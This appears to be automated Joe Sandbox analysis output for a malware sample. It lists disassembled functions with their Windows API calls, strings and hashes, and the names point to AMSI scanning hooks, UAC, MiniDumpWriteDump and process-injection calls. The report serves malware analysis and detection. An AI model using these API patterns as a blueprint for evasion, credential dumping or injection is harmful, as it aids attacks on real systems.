                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                          • API String ID: 2624078988-51457883
                                                          • Opcode ID: 5a77300e007a9ab3b771e74173a40d8973e2893b7a61ab6ecfc1fc1468098ce4
                                                          • Instruction ID: 445aa738938d31f889c5b4537b4f78a11c83a315bb3aca6a374eaf8739533467
                                                          • Opcode Fuzzy Hash: 5a77300e007a9ab3b771e74173a40d8973e2893b7a61ab6ecfc1fc1468098ce4
                                                          • Instruction Fuzzy Hash: 54E2DC3DB0461D9FDB51FB68D8C0ACF73BAAF85300F1041A2A715EB255DA70AE458F92
                                                          Function 02908D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          • GetThreadContext.KERNEL32(00000000,02977424,ScanString,029773A8,0290A93C,UacInitialize,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,UacInitialize,029773A8), ref: 02909602
                                                            • Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                          • API String ID: 4276370345-51457883
                                                          • Opcode ID: 775b889922e4f4ea9e3ffb068ceedad08e200ce32dd974df6386c93861d466ac
                                                          • Instruction ID: 827c3b84c00869c38a01b2e17dce8c63d633097ad5b6c213574f88da7417f52b
                                                          • Opcode Fuzzy Hash: 775b889922e4f4ea9e3ffb068ceedad08e200ce32dd974df6386c93861d466ac
                                                          • Instruction Fuzzy Hash: BEE2DC3DB0461D9FDB51FB68D8C0ACB73BAAF85300F1041A2A715EB255DA70AE458F92
                                                          Function 028F5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5925
                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028F593C
                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 028F596C
                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F59D0
                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A06
                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A19
                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A2B
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A37
                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000), ref: 028F5A6B
                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14), ref: 028F5A77
                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028F5A99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                          • API String ID: 3245196872-1565342463
                                                          • Opcode ID: a070a852976cdbbf218550cc40c8bfccfb94d84779db8caf80dcb2c6c9187a87
                                                          • Instruction ID: ef55a9ec0b2ff20b532f2ff46533530a4c3731897ddfce763f107437defa55c1
                                                          • Opcode Fuzzy Hash: a070a852976cdbbf218550cc40c8bfccfb94d84779db8caf80dcb2c6c9187a87
                                                          • Instruction Fuzzy Hash: E3417D7DE00219EFDB50DBE8CC88ADEB3BDAF08340F4445A5A648E7241E7389B548F50
                                                          Function 028F5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 1599918012-2375825460
                                                          • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                          • Instruction ID: 996d2483c06f923c6eb36d4cc1bbfc0eedac37928fba04891d7eb72a39e7f425
                                                          • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                          • Instruction Fuzzy Hash: E631A77DE4026C6AFB65D6F8CC49FDE77ED9B04380F4401A19709E6181D7789E848FA1
                                                          Function 029BD800 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dcb224859250cd723320a065f1804b0e82770bf61cc8bf650626b273fdae68a5
                                                          • Instruction ID: 019dc6e1539ee398450a16073bb50d7f4a3d0de8d1a64cc4022d5ccbcd0a48ad
                                                          • Opcode Fuzzy Hash: dcb224859250cd723320a065f1804b0e82770bf61cc8bf650626b273fdae68a5
                                                          • Instruction Fuzzy Hash: 25023C71E012299BDF15CFA9C9806EDFBF5EF88324F258169D819E7344D731AA41CB90
                                                          Function 029CB769 Relevance: 2.9, APIs: 1, Instructions: 1381COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID:
                                                          • API String ID: 4168288129-0
                                                          • Opcode ID: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                          • Instruction ID: 9e64454df4b52a5f08f1182657c2204b136f4bb5e2d34f6a888d4626320917be
                                                          • Opcode Fuzzy Hash: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                          • Instruction Fuzzy Hash: 14C24D71E086298FDB25CE28DD507EAB7B9EB84309F2445EED44DE7240E774AE818F41
                                                          Function 029AAF67 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                          • Instruction ID: a8c495e36e1fc3bbc64621d79bedf1be42ca1613ce50b82ab73c10baab060be1
                                                          • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                          • Instruction Fuzzy Hash: 02124B326083108BD714DF65D891A1FF7E2BFC8754F258D2EE499EB280DA74E855CB82
                                                          Function 0299E9BE Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                          • Instruction ID: 20314ea9f71f9961723fa637a75b7ecda550e8643e3d61a6e365ddbedfe63688
                                                          • Opcode Fuzzy Hash: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                          • Instruction Fuzzy Hash: 8A02BDB16146518FC358CF2EEC9063AB7E1BB8D321744863EE495C7781EB35E922CB94
                                                          Function 0299E42F Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                          • Instruction ID: 8541171813f3781116f33fe21c5a3d53a7bed4016a4da8d7a11779f6b470ea5b
                                                          • Opcode Fuzzy Hash: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                          • Instruction Fuzzy Hash: F3F19F756142548FC748CF1DE8A183BB3E5FB89311B440A2EF582C3391DB75EA16CBA6
                                                          Function 028F7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028F7FF5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1705453755-0
                                                          • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                          • Instruction ID: 83818ab110c470f96b4b89bd2afd59ac9890b3d465d0212380afc60e89504758
                                                          • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                          • Instruction Fuzzy Hash: BE1112B5E00209AF9B40CF9DC881DAFF7F9FFC9300B54C559A508E7254E6719A018B90
                                                          Function 028FA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                          • Instruction ID: 9ec6ec7235ab93aa76157bd7675512dbf8743d66c1b7baa8262d148cf78212bc
                                                          • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                          • Instruction Fuzzy Hash: D3E0927D71421817D355A56C9C80EF6735D975C310F00426AAB09C7385FDE19E844AE5
                                                          Function 02995183 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                          • Instruction ID: be5d59394ab7cf71d8ca0e3f2921382a908f5dcc7c51c1b6a3895f6cf9065da4
                                                          • Opcode Fuzzy Hash: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                          • Instruction Fuzzy Hash: E6B18F3911429A8ACF06EF68C4913F63BA5EF6A310F4850B9EC9C8F757D2358506EB24
                                                          Function 028FB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,0291D106,00000000,0291D11E), ref: 028FB79A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: d4e0daec3f88572f64d10e28bb358b5f31165eb693074d63009e82d5560ceb93
                                                          • Instruction ID: 51ccb443ca7eeda55df60f9067f3c0eabc9cdb8990eff9aa12aa5569b1325b34
                                                          • Opcode Fuzzy Hash: d4e0daec3f88572f64d10e28bb358b5f31165eb693074d63009e82d5560ceb93
                                                          • Instruction Fuzzy Hash: 69F0A4789483069FE394DF2AD44162677E9FF49754F004D29EAE8C7380E7349414CB52
                                                          Function 028FA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028FBE72,00000000,028FC08B,?,?,00000000,00000000), ref: 028FA823
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                          • Instruction ID: e480340bbd255d984be7eb471b6dac566773aa263c4857e350bc6b9678db8914
                                                          • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                          • Instruction Fuzzy Hash: 4AD05EAE31E2602AA214915A2D84DBB5BECCAC97B1F00413ABA8CC6101E2448C07DAB1
                                                          Function 028F920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID:
                                                          • API String ID: 481472006-0
                                                          • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                          • Instruction ID: 0fe0f4cc5d7b7ae31a642f954b9003fca811c02ef7d046c5f60acdabe37629f8
                                                          • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                          • Instruction Fuzzy Hash: 11A01248404830418580331C0C0253431445810B20FC4874068F8842D1F91E01208193
